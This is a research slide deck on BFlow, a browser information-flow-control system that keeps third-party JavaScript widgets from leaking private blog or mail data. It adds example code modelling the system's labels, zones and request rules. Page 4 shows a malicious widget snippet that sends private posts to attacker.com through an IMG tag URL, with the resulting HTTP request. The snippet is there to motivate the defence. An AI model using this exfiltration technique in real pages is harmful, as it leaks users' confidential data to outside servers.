Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology

Page 1: Privacy-Preserving Browser-Side Scripting With BFlow Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris Massachusetts Institute of Technology.

Privacy-Preserving Browser-Side Scripting With BFlow

Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris

Massachusetts Institute of Technology

Page 2:

Web Sites Support 3rd Party JavaScript Extensions

[Figure: example widgets on a blog page: “Snippets of the last few blog posts”, “Display the last few reader comments”]

• Blogger.com supports “widgets”
  – read and modify blog posts

Page 3:

Confidential Blogs Are Vulnerable to 3rd Party JavaScript

Page 4:

A 3rd Party JavaScript Leak Attack

Widget’s JavaScript source code:

    private_data = document.getElementById("posts");
    widget.innerHTML = private_data;
    widget.innerHTML += '<IMG SRC=http://attacker.com/' + private_data + '.gif>';

HTTP Request (from Alice’s browser to the attacker.com server):

    GET /sell_pet_food_online.gif HTTP/1.0

[Figure: Alice’s browser runs Blogger JS + Attacker JS; the widget has access to private blog content, shows it in the widget’s box, and leaks it to attacker.com]

• Blogger.com wants to provide data to widgets
• Browser security policy permits JS to send data freely
• Wrote a malicious blogger.com widget in one hour

Page 5:

Problem: Extensibility vs. Privacy

[Figure: a mail client with two 3rd party extensions, “Dan’s Spell Checker” (Check Spelling!) and “Joe’s Encryption Widget” (Encrypt Mail / Decrypt Mail), shown over a mail body of random text]

(Choose one)

• Either choose cool extensibility features
  – e.g. Blogger.com widgets
• Or choose privacy and no 3rd party code
  – e.g. Gmail

Page 6:

Solution: BFlow

• Eliminate the choice between features & privacy
• Add information flow control (IFC)
  – To JavaScript in the browser
  – Track private data inside the browser and server
• Prohibit communication that leaks private data

Page 7:

Challenges

• Fit JavaScript environment into an IFC model
  – Preserve JavaScript communication channels
  – Mashups with private data

[Figure: a frame can send to the top-level frame or to a sub-frame; a mashup sends a private address to the Google Maps server]

• Easy to adopt
  – Minimize changes to JS that uses existing communication channels
  – Minimize changes required on the server
  – Easy for end-users to start using

Page 8:

Contributions

• An IFC model for the JS runtime environment
• Easy to deploy and adopt implementation
  – Installs in browser with 2 clicks
  – Requires no changes to JavaScript interpreter
  – Only small changes to JavaScript communication API
• A platform that supports real blogger.com widgets

Page 9:

BFlow Overview

[Figure: browser with a reference monitor separating the trusted protection zone from the untrusted protection zones; the blog web server and the attacker.com server sit outside the browser]

• Blog server supplies some HTML/JS
  – Blog server “labels” private data with a “tag”
• 3rd party supplies widget HTML/JS
• Reference monitor knows when a zone reads private data
  – Such a zone is labelled: “Saw Alice’s private data”

Page 10:

BFlow Overview

[Figure: browser reference monitor with the blog web server, the attacker.com server and the Google Maps server]

• Have not seen private data: can send requests to any server
• Have seen private data: can only send requests to the data’s server
• Declassification: fetch map image from Google Maps, OK!
• BFlow prevents the malicious widget from leaking private data

Page 11:

Design Outline

• Tags and Labels
• Protection Zones
• Reference Monitor
• Server

Page 12:

Tags And Labels

• A label is a set of tags
  – Describes what private data an object contains
  – Each zone, HTTP request, and response has a label
• Each tag identifies a kind of private data
  – Alice’s tag: blogger.com:alice
  – Bob’s tag: blogger.com:bob
• e.g. Alice’s blog has label L={blogger.com:alice}

Page 13:

Data Flow Rule

• Data may flow only if Ldata ⊆ Lreceiver

    Data Label   Receiver Label   May Receive
    {x}          {x,y}            Yes
    {x}          {}               No

[Figure: labelled data flowing to a receiver running JavaScript]

Page 14:

Protection Zones

• A zone is a group of browser HTML <frames>
  – Regular JavaScript runs inside a frame inside a zone
  – All frames in a zone share the same label
• Trusted zone
  – Top-level frame is in the site’s trusted zone
  – Contains JavaScript written only by the site’s developers
  – Need not abide by information flow restrictions
• Untrusted zones
  – Contain 3rd party JavaScript
  – Must abide by information flow restrictions

Page 15:

Example Zones & Labels

[Figure: a page with a trusted zone (no label) and four untrusted zones: Zone A L={}, Zone B L={blogger.com:alice}, Zone C L={}, Zone D L={blogger.com:alice}]

Page 16:

How Do Untrusted Zones Get Labels?

• Trusted zone sets untrusted zone’s label

[Figure: the blog web server, the browser reference monitor, and an untrusted zone whose label changes from L={} to L={blogger.com:alice} when the trusted zone calls augment_label(blogger.com:alice)]

Page 17:

Works With Existing JS Channels

• Channel 1: A frame can always send to its child frame
  – Lparent ⊆ Lchild
• Channel 2: A frame can always send to the top-level frame
  – To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame

[Figure: a web page showing the inherent JavaScript channels: a top-level frame from X.com; Frame 1 with L={X.com:A}; Frame 2 with L={X.com:A, X.com:B}. Frame 1 may not add X.com:C to its label. No sub-frame from X.com may add a tag from Y.com]
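The label rules on pages 12 to 17 (labels as tag sets, the Ldata ⊆ Lreceiver flow rule, augment_label, and the two inherent channel constraints) fit in a small model. The following is an added example, not BFlow’s own code, and it assumes a few things the slides do not state: tags are strings of the form "site:name", zones form a tree that mirrors the frame tree, a new zone starts with its parent’s label so that Lparent ⊆ Lchild holds from the outset, and in the page-17 diagram Frame 2 is a sub-frame of Frame 1. The names ReferenceMonitor, createZone, augmentLabel, mayReceive and page17Example are this example’s, not BFlow’s API.

```javascript
// Added example, not BFlow's own code: a toy model of BFlow's tags, labels,
// protection zones and the reference monitor's augment_label check, built
// from the rules on the slides. Assumptions (not on the slides): tags are
// "site:name" strings, zones form a tree mirroring the frame tree, and a new
// zone starts with its parent's label so L_parent ⊆ L_child holds initially.

// A label is a set of tags.
const label = (...tags) => new Set(tags);

// Is L_a ⊆ L_b?
function isSubset(a, b) {
  for (const t of a) if (!b.has(t)) return false;
  return true;
}

// Data flow rule: data may flow only if L_data ⊆ L_receiver.
function mayFlow(dataLabel, receiverLabel) {
  return isSubset(dataLabel, receiverLabel);
}

// The site a tag belongs to: "blogger.com:alice" -> "blogger.com".
const tagSite = (tag) => tag.slice(0, tag.indexOf(":"));

// Reference monitor for one page whose top-level frame came from `site`.
class ReferenceMonitor {
  constructor(site) {
    this.site = site;
    this.zones = new Map();
    // The trusted zone holds the top-level frame and carries no label.
    this.zones.set("trusted", { name: "trusted", trusted: true, parent: null, label: new Set() });
  }

  // Create an untrusted zone whose frames are children of `parentName`'s frames.
  createZone(name, parentName = "trusted") {
    const parent = this.zones.get(parentName);
    if (!parent) throw new Error(`unknown parent zone ${parentName}`);
    const zone = { name, trusted: false, parent, label: new Set(parent.label) };
    this.zones.set(name, zone);
    return zone;
  }

  childrenOf(zone) {
    return [...this.zones.values()].filter((z) => z.parent === zone);
  }

  // augment_label(zone, tag): add `tag` to an untrusted zone's label.
  // The checks encode the two inherent JavaScript channels:
  //  - channel 2 (any frame may send to the top-level frame): untrusted zones
  //    may carry only tags from the top-level frame's site;
  //  - channel 1 (a frame may always send to its child): L_parent ⊆ L_child
  //    must still hold afterwards, so every child zone must already carry `tag`.
  augmentLabel(zoneName, tag) {
    const zone = this.zones.get(zoneName);
    if (!zone) return { ok: false, reason: `unknown zone ${zoneName}` };
    if (zone.trusted) return { ok: false, reason: "the trusted zone carries no label" };
    if (tagSite(tag) !== this.site) {
      return { ok: false, reason: `${tag} is not a ${this.site} tag` };
    }
    for (const child of this.childrenOf(zone)) {
      if (!child.label.has(tag)) {
        return { ok: false, reason: `child zone ${child.name} would lack ${tag}` };
      }
    }
    zone.label.add(tag);
    return { ok: true, reason: "" };
  }

  // May data labelled `dataLabel` be delivered into zone `toName`?
  // The trusted zone need not abide by the flow rule; untrusted zones must.
  mayReceive(toName, dataLabel) {
    const to = this.zones.get(toName);
    if (!to) throw new Error(`unknown zone ${toName}`);
    return to.trusted || mayFlow(dataLabel, to.label);
  }
}

// Walk-through of the page-17 diagram: an X.com page, Frame 1 with {X.com:A},
// Frame 2 (assumed to be a sub-frame of Frame 1) with {X.com:A, X.com:B}.
function page17Example() {
  const rm = new ReferenceMonitor("X.com");
  rm.createZone("frame1");
  rm.augmentLabel("frame1", "X.com:A");
  rm.createZone("frame2", "frame1");                        // starts with {X.com:A}
  rm.augmentLabel("frame2", "X.com:B");
  return {
    frame1AddsC: rm.augmentLabel("frame1", "X.com:C").ok,   // false: Frame 2 lacks C
    frame2AddsC: rm.augmentLabel("frame2", "X.com:C").ok,   // true: no child to break
    frame1AddsYcom: rm.augmentLabel("frame1", "Y.com:D").ok, // false: tag from another site
    frame2GetsA: rm.mayReceive("frame2", label("X.com:A")), // true: {A} ⊆ {A,B,C}
    frame1GetsB: rm.mayReceive("frame1", label("X.com:B")), // false: {B} ⊄ {A}
    topGetsB: rm.mayReceive("trusted", label("X.com:B")),   // true: trusted zone
  };
}
```

The child check in augmentLabel is what makes “Frame 1 may not add X.com:C” fall out of the rule rather than being a special case: raising a parent’s label above a child’s would let the parent push C-labelled data down a channel the browser cannot close.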

Page 18:

Why Zones Instead Of Frames?

• Some JavaScript consists of multiple frames
• Group JavaScript into modules by label
  – All frames in the same zone can always communicate
  – Trusted JavaScript sets the label of a multi-frame widget only once
  – Existing multi-frame widgets need not coordinate label changes

e.g. Cbox chat widget: bottom frame writes messages to top frame

Page 19:

BFlow’s JavaScript Model

• All JavaScript will work if the IFC rules allow
  – AJAX, eval()
• The IFC rule (Ldata ⊆ Lreceiver) affects
  – access to DOM variables & cookies
  – postMessage(), fragment-ID messages
  – HTTP requests and responses

Page 20:

HTTP Request Rules

• Trusted zone T
  – can send to any server (always)
  – can receive a response from any server (always)
• Untrusted zone Z
  – can send to the server where secret data came from (always)
    • can receive the response (when Lresponse ⊆ LZ)
  – can send to 3rd party server E (when LZ = {})
    • or web site has a declassification exception for (server E, URL)
    • can receive the response (always)

Page 21:

The BFlow Server API

• Propagate label from HTTP requests to responses
  – Read label contained in each request
  – Attach the label to any response that uses labeled data

[Figure: Zone A (L={blogger.com:alice}) sends “HTTP Request: POST save_post?content=sell_petfood_online, Label: L = {blogger.com:alice}” to the blog web server; the server returns “HTTP Response Contents: sell_petfood_online, Label: L = {blogger.com:alice}” to Zone B (L={blogger.com:alice})]
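The request rules on page 20 and the request-to-response label propagation on page 21 can be run together through the leak scenario the deck uses (page 25). The following is an added example, not BFlow’s own code, and it assumes: a zone is an object {trusted, label}; a label is a Set of "site:name" tags, so “the server where secret data came from” is the site part of each tag; and the toy blog server labels a response with the union of the labels of the posts it returns. RequestPolicy, BlogServer, runLeakScenario and the maps.google.com declassification exception are constructed for this example and are not BFlow identifiers.

```javascript
// Added example, not BFlow's own code: the decisions on the "HTTP Request
// Rules" slide and the label propagation on the "BFlow Server API" slide,
// written as plain functions and run through the widget leak scenario.
// Assumptions: a zone is {trusted, label}; a label is a Set of "site:name"
// tags; the toy server labels a response with the union of the labels of
// the posts it returns. All names below are this example's, not BFlow's.

function isSubset(a, b) {
  for (const t of a) if (!b.has(t)) return false;
  return true;
}
const tagSite = (tag) => tag.slice(0, tag.indexOf(":"));
const union = (a, b) => new Set([...a, ...b]);

// The web site's policy: declassification exceptions are (server E, URL) pairs.
class RequestPolicy {
  constructor(exceptions = []) {
    this.exceptions = new Set(exceptions.map(([server, url]) => server + url));
  }

  // May zone Z send a request for `url` to `server`?
  canSend(zone, server, url) {
    if (zone.trusted) return true;                                        // trusted zone T: always
    if (zone.label.size === 0) return true;                               // L_Z = {}: has seen no secret
    if ([...zone.label].every((t) => tagSite(t) === server)) return true; // the data's own server: always
    return this.exceptions.has(server + url);                             // 3rd party E: only via exception
  }

  // May zone Z receive a response carrying `responseLabel`?
  // From the data's server the rule is L_response ⊆ L_Z. A 3rd-party response
  // carries no label (empty set), so the same test always passes for it.
  canReceive(zone, responseLabel) {
    return zone.trusted || isSubset(responseLabel, zone.label);
  }
}

// Toy blog server: reads the label on each request and attaches a label to
// every response that uses labelled data.
class BlogServer {
  constructor() {
    this.posts = []; // { owner, content, label }
  }

  handle(req) {
    if (req.method === "POST" && req.path === "/save_post") {
      this.posts.push({ owner: req.owner, content: req.content, label: new Set(req.label) });
      return { status: 200, body: "saved", label: new Set(req.label) };
    }
    if (req.method === "GET" && req.path === "/posts") {
      const mine = this.posts.filter((p) => p.owner === req.owner);
      const lbl = mine.reduce((acc, p) => union(acc, p.label), new Set());
      return { status: 200, body: mine.map((p) => p.content), label: lbl };
    }
    return { status: 404, body: "", label: new Set() };
  }
}

// The scenario on the slides: a widget zone labelled {blogger.com:alice} saves
// and reads back Alice's post, then tries to reach attacker.com.
function runLeakScenario() {
  const policy = new RequestPolicy([["maps.google.com", "/staticmap"]]);      // constructed exception
  const server = new BlogServer();
  const widget = { trusted: false, label: new Set(["blogger.com:alice"]) }; // zone with L={blogger.com:alice}
  const fresh = { trusted: false, label: new Set() };                      // zone with L={}

  server.handle({ method: "POST", path: "/save_post", owner: "alice",
                  content: "sell_petfood_online", label: widget.label });
  const resp = server.handle({ method: "GET", path: "/posts", owner: "alice", label: widget.label });

  return {
    saveAllowed: policy.canSend(widget, "blogger.com", "/save_post"),                 // true
    responseLabel: [...resp.label],                                                    // ["blogger.com:alice"]
    widgetReadsResponse: policy.canReceive(widget, resp.label),                        // true
    freshZoneReadsResponse: policy.canReceive(fresh, resp.label),                      // false: L_response ⊄ {}
    leakBlocked: !policy.canSend(widget, "attacker.com", "/sell_petfood_online.gif"), // true
    mapAllowed: policy.canSend(widget, "maps.google.com", "/staticmap"),              // true: declassification exception
    freshZoneFree: policy.canSend(fresh, "attacker.com", "/anything.gif"),            // true: L_Z = {}
  };
}
```

Note that the label never leaves the server’s control unwrapped: the response to the widget carries the same label the request brought in, and an unlabelled zone cannot read it until the trusted zone raises that zone’s label, which is exactly the point at which the zone loses the right to contact attacker.com.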

Page 22:

BFlow Implementation

• Browser Reference Monitor
  – Firefox extension, 1100 lines of code
  – Users can install with 2 clicks
• JavaScript communication API changed slightly
• No changes to JavaScript interpreter

Page 23:

Zone Isolation

[Figure: two zones with distinct domain names, Zone1.blogger and Zone2.blogger, and no direct communication between them]

• Repurpose browser’s same-origin policy (SOP)
  – Zones communicate via reference monitor
  – SOP is conservative: no DOM read/write across zones even if labels would allow

Page 24:

Applications

• BF-Socialnet
  – Social network that supports 3rd party JS extensions
  – Protects private user data (see paper)
• BFlogger
  – Blog mockup that supports blogger.com widgets
  – Ported 12 existing widgets to BFlogger

Page 25:

BFlow Preserves Privacy

• Wrote a malicious Blogger.com widget
  – Successfully leaks data from confidential blogs
• Ported widget to BFlogger
  – BFlow prevents malicious widget from leaking data

[Figure: the attacker.com server receives no requests after the widget reads private data]

Page 26:

BFlow Runs Existing JavaScript

    Widget          Lines of Code   Lines Changed   Uses Secret Data?
    Twitter         25              0               No
    Flickr          10              0               No
    Buzz            1               0               No
    Youtube         1982            0               No
    Calendar        1945            0               No
    Weather         3790            0               No
    Popular Posts   16              1               Yes
    Commenters      15              1               Yes
    Recent Posts    74              2               Yes
    Random Post     34              2               Yes
    Cbox-chat       801             89              Yes

(Cbox-chat’s count is high because we made Chat store data on the BFlow server to protect chat data)

• Better privacy with little or no changes

Page 27:

Existing Research

• Can’t grant read access without also leaking [MashupOS]
• Requires rewriting JavaScript & manual jail config [Caja]
• Don’t support untrusted JavaScript [Swift, SIF]
• User must make disclosure decisions [NoMoXSS]
• Certificates [Java]

Page 28:

Conclusion

• 3rd party JavaScript can leak confidential user data
• BFlow provides a new web security model
  – Tracks information flow between client & server
  – 3rd party JavaScript can safely compute and display
  – Enables new features in web sites
    • e.g. 3rd party Gmail extensions

Questions